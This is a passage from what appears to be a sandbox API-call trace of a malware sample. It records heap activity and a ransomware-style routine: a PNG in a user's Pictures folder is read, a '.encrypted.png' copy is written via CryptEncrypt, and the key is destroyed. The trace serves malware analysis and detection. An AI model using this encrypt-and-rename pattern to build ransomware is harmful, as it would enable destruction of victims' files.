lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0039.481] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19b8 | out: hHeap=0x770000) returned 1 [0039.481] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0039.481] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0039.481] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.481] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0039.481] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0039.481] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da138 [0039.481] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0039.481] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da138 | out: hHeap=0x770000) returned 1 [0039.481] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0039.481] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0039.481] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.481] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0039.481] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.481] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2140 | out: hHeap=0x770000) returned 1 [0039.481] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.481] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0039.481] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19b8 [0039.481] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0039.482] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0039.482] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0039.482] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da138 | out: hHeap=0x770000) returned 1 [0039.482] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0039.482] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0039.482] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da138 | out: hHeap=0x770000) returned 1 [0039.482] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2140 [0039.482] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xaa0008 [0039.482] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0039.482] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da138 [0039.482] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\HFkYcn4W3ToL.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\hfkycn4w3tol.png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0039.482] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0039.482] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0039.482] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0039.482] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0039.482] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0039.482] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0039.482] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0039.482] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0039.482] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19b8 | out: hHeap=0x770000) returned 1 [0039.482] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0039.482] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.482] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0039.482] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0039.482] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0039.483] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0039.483] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0039.483] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0039.483] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0039.483] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.483] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0039.483] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.483] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0039.483] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19b8 [0039.483] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0039.483] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0039.483] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0039.483] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0039.483] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0039.483] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0039.483] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0039.483] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0039.483] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0039.483] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0039.483] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0039.483] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0039.483] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0039.483] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0039.483] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0039.483] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c958 [0039.483] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0039.483] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0039.483] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0039.483] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0039.484] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0039.484] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0039.484] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da158 [0039.484] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0039.484] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0039.484] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0039.484] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x90) returned 0x7c38b0 [0039.484] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0039.484] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f3630 [0039.484] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0039.484] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f36e0 [0039.484] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c38b0 | out: hHeap=0x770000) returned 1 [0039.484] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0039.484] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0039.484] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0039.484] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0039.484] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0039.484] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3630 | out: hHeap=0x770000) returned 1 [0039.484] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0039.484] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\HFkYcn4W3ToL.encrypted.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\hfkycn4w3tol.encrypted.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0039.484] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17d8 [0039.485] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c958 [0039.485] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0039.485] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.485] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0039.485] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0039.485] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0039.485] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.485] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.485] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2200 [0039.485] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.485] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0039.485] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19b8 [0039.485] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0039.485] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0039.485] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0039.485] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x10000, lpOverlapped=0x0) returned 1 [0039.487] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0xae9, lpOverlapped=0x0) returned 1 [0039.487] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0039.490] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.490] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0039.490] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19b8 [0039.490] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0039.490] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0039.490] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0039.490] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10ae9) returned 0xac0018 [0039.491] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.491] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0039.491] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0039.491] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0039.491] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.491] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0039.491] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0039.492] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0039.492] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0039.493] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.493] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0039.493] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.493] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18c8 [0039.493] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0039.493] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0039.493] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0039.493] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0039.493] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c60 [0039.493] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0039.493] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0039.493] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0039.493] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0039.493] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0039.493] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0039.493] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0039.493] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0039.493] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da298 [0039.493] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0039.494] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0039.494] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0039.494] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0039.494] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0039.494] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da268 [0039.494] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0039.494] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da248 [0039.494] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0039.494] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1918 [0039.494] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0039.494] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0039.494] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0039.494] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0039.494] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c820 [0039.494] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da208 [0039.494] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0039.494] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da248 [0039.494] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0039.494] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1918 [0039.494] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0039.494] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da208 [0039.494] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0039.494] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0039.494] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da248 [0039.494] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0039.494] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0039.494] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da328 [0039.494] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0039.495] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0039.495] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0039.495] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0039.495] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da328 [0039.495] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0039.495] CryptGetKeyParam (in: hKey=0x7c2280, dwParam=0x7, pbData=0x7da268, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da268*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0039.495] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0039.495] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b87d0 [0039.495] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0039.495] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0039.495] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0039.495] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0039.495] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3a8 [0039.495] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0039.495] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da248 [0039.495] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0039.495] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0039.495] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0039.495] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da248 [0039.495] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b20 [0039.495] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0039.495] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0039.495] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae9a8 [0039.495] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.495] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.496] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0039.496] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0039.496] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0039.496] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0039.496] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0039.496] CryptEncrypt (in: hKey=0x7c2280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0x10ae9, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0x10af0) returned 1 [0039.497] CharLowerBuffW (in: lpsz="byte[68337]", cchLength=0xb | out: lpsz="byte[68337]") returned 0xb [0039.498] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0039.498] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0039.498] CryptEncrypt (in: hKey=0x7c2280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x945b00*, pdwDataLen=0x6ae220*=0x10ae9, dwBufLen=0x10af0 | out: pbData=0x945b00*, pdwDataLen=0x6ae220*=0x10af0) returned 1 [0039.498] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0039.498] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0039.498] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0039.518] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0039.518] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0039.518] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0039.518] CryptDestroyKey (hKey=0x7c2280) returned 1 [0039.518] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0039.518] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0039.519] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0039.519] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0039.519] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0039.519] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0039.519] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: 